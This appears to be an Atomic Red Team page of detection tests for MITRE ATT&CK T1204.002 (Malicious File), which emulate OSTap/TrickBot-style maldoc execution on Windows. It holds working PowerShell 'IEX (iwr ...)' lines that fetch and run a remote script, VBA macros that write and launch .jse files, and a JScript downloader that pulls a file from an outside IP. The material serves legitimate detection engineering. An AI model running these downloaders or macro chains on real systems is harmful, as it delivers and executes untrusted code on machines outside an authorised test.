Skip to content

Latest commit

 

History

History
213 lines (132 loc) · 8.22 KB

T1204.002.md

File metadata and controls

213 lines (132 loc) · 8.22 KB

T1204.002 - Malicious File

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of Masquerading on the file to increase the likelihood that a user will open it.

While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Atomic Tests


Atomic Test #1 - OSTap Style Macro Execution

This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.

This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
jse_path Path for the macro to write out the "malicious" .jse file String C:\Users\Public\art.jse
ms_product Maldoc application Word or Excel String Word
ms_office_version Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" String 16.0

Attack Commands: Run with powershell!

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
Check Prereq Commands:
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
Get Prereq Commands:
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD


Atomic Test #2 - OSTap Payload Download

Uses cscript //E:jscript to download a file

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
script_file File to execute jscript code from Path %TEMP%\OSTapGet.js
file_url URL to retrieve file from Url https://128.30.52.100/TR/PNG/iso_8859-1.txt

Attack Commands: Run with command_prompt!

echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}

Cleanup Commands:

del #{script_file} /F /Q >nul 2>&1


Atomic Test #3 - Maldoc choice flags command execution

This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
ms_product Maldoc application Word or Excel String Word
ms_office_version Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" String 16.0

Attack Commands: Run with powershell!

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
Check Prereq Commands:
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
Get Prereq Commands:
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD


Atomic Test #4 - OSTAP JS version

Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript

Execution is handled by Invoke-MalDoc to load and execute VBA code into Excel or Word documents.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
jse_path jse file to execute with wscript Path C:\Users\Public\art.jse
ms_product Maldoc application Word or Excel String Word
ms_office_version Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" String 16.0

Attack Commands: Run with powershell!

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
Check Prereq Commands:
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
Get Prereq Commands:
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD